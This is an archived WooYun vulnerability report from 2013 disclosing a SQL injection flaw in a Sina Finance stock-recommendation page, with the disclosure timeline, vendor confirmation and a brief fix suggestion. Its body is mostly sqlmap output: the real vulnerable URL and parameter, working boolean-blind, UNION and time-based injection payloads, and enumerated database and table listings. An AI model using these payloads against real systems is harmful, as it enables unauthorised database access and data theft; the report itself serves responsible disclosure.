漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-039774
漏洞标题:新浪财经的一个sqli注入漏洞
相关厂商:新浪
漏洞作者: 霍大然
提交时间:2013-10-15 11:02
修复时间:2013-11-29 11:03
公开时间:2013-11-29 11:03
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-15: 细节已通知厂商并且等待厂商处理中
2013-10-15: 厂商已经确认,细节仅向厂商公开
2013-10-25: 细节向核心白帽子及相关领域专家公开
2013-11-04: 细节向普通白帽子公开
2013-11-14: 细节向实习白帽子公开
2013-11-29: 细节向公众公开
简要描述:
新浪财经的一个sqli注入漏洞
详细说明:
注入点:
http://biz.finance.sina.com.cn/stkrcmd/stkrcmd_people.php?stk_id=sh600981 (GET)
Place: GET
Parameter: stk_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stk_id=sh600981' AND 5502=5502 AND 'oTFg'='oTFg
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: stk_id=sh600981' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: stk_id=sh600981' AND SLEEP(5) AND 'VpRa'='VpRa
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Payload: stk_id=sh600981' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: stk_id=sh600981' AND SLEEP(5) AND 'VpRa'='VpRa
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] biz
[*] information_schema
[*] test
back-end DBMS: MySQL 5.0.11
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: USER_PRIVILEGES
[4 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| GRANTEE | varchar(81) |
| IS_GRANTABLE | varchar(3) |
| PRIVILEGE_TYPE | varchar(64) |
| TABLE_CATALOG | varchar(512) |
+----------------+--------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: TABLES
[21 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| VERSION | bigint(21) |
| AUTO_INCREMENT | bigint(21) |
| AVG_ROW_LENGTH | bigint(21) |
| CHECK_TIME | datetime |
| CHECKSUM | bigint(21) |
| CREATE_OPTIONS | varchar(255) |
| CREATE_TIME | datetime |
| DATA_FREE | bigint(21) |
| DATA_LENGTH | bigint(21) |
| ENGINE | varchar(64) |
| INDEX_LENGTH | bigint(21) |
| MAX_DATA_LENGTH | bigint(21) |
| ROW_FORMAT | varchar(10) |
| TABLE_CATALOG | varchar(512) |
| TABLE_COLLATION | varchar(64) |
| TABLE_COMMENT | varchar(80) |
| TABLE_NAME | varchar(64) |
| TABLE_ROWS | bigint(21) |
| TABLE_SCHEMA | varchar(64) |
| TABLE_TYPE | varchar(64) |
| UPDATE_TIME | datetime |
+-----------------+--------------+
漏洞证明:
修复方案:
对参数过滤
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-10-15 11:24
厂商回复:
感谢关注新浪安全,马上安排相关人员修复
最新状态:
暂无